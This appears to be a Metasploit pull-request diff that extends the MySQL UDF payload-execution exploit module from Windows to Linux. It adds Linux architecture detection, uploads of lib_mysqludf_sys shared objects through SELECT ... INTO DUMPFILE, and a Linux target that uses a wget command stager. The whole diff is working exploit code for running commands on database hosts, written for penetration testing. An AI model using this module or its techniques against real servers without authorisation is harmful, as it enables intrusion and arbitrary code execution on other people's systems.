mysql UDF now multi

documentation/modules/exploit/multi/local/mysql_udf_priv_esc.md

@@ -0,0 +1 @@
+on ubuntu, edit /lib/systemd/system/mysql.service

lib/msf/core/exploit/mysql.rb

@@ -144,21 +144,32 @@ module Exploit::Remote::MYSQL
     binname = Rex::Text.rand_text_alpha(8)
     binpath = tmpdir << binname
     print_status "Uploading binary as #{binpath}..."
+    print_status "SELECT #{blob} into DUMPFILE '#{binpath}'"
     res = mysql_query("SELECT #{blob} into DUMPFILE '#{binpath}'")
     return res
   end
 
   def mysql_upload_sys_udf(arch=:win32,target_path=nil)
-    fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll")
+    case arch
+    when :win32
+      fname = 'lib_mysqludf_sys_32.dll'
+    when :win64
+      fname = 'lib_mysqludf_sys_64.dll'
+    when :linux32
+      fname = 'lib_mysqludf_sys_32.so'
+    when :linux64
+      fname = 'lib_mysqludf_sys_64.so'
+    end
     sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname )
     data = File.open(sys_dll, "rb") {|f| f.read f.stat.size}
     blob = "0x"
     blob << data.unpack("C*").map {|x| "%02x" % [x]}.join
     dll_name = Rex::Text.rand_text_alpha(8)
-    target_dll = target_path << dll_name << ".dll"
+    [:win32, :win64].include?(arch) ? extension = '.dll' : extension = '.so'
+    target_dll = target_path << dll_name << extension
     print_status "Uploading #{fname} library to #{target_dll}..."
     mysql_query("SELECT #{blob} into DUMPFILE '#{target_dll}'")
-    return dll_name << ".dll"
+    return dll_name << extension
   end
 
   def mysql_drop_and_create_sys_exec(soname)
@@ -181,6 +192,15 @@ module Exploit::Remote::MYSQL
       :win64
     when /Win32/i
       :win32
+    when /Linux/i
+      # we need a second query to determine bits
+      res = mysql_get_variable("@@version_compile_machine")
+      return :unknown unless res
+      if res =~ /x86_64/i
+        :linux64
+      else
+        :linux32
+      end
     else
       res
     end
@@ -189,7 +209,7 @@ module Exploit::Remote::MYSQL
   def mysql_add_sys_exec
     arch = mysql_get_arch
     case arch
-    when :win64,:win32
+    when :win64,:win32,:linux64,:linux32
       target_path = mysql_get_plugin_dir
       if target_path
         print_status "Target arch (#{arch}) and target path both okay."

modules/exploits/multi/mysql/mysql_udf_payload.rb

@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name'           => 'Oracle MySQL for Microsoft Windows Payload Execution',
+        'Name'           => 'Oracle MySQL UDF Payload Execution',
         'Description'    => %q{
           This module creates and enables a custom UDF (user defined function) on the
           target host via the SELECT ... into DUMPFILE method of binary injection. On
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author'         =>
           [
             'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
-            'todb' # this Metasploit module
+            'todb', # this Metasploit module
+            'h00die' # linux addition
           ],
         'License'        => MSF_LICENSE,
         'References'     =>
@@ -35,12 +36,12 @@ class MetasploitModule < Msf::Exploit::Remote
             # Bernardo's work with cmd exec via udf
             [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
           ],
-        'Platform'       => 'win',
+        'Platform'       => ['win', 'linux'],
         'Targets'        =>
           [
-            [ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
+            [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
+            [ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
           ],
-        'CmdStagerFlavor' => 'vbs',
         'DefaultTarget'  => 0,
         'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
     ))
@@ -83,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if not m
       return
-    elsif not [:win32,:win64].include?(@mysql_arch)
+    elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
       print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
       return
     else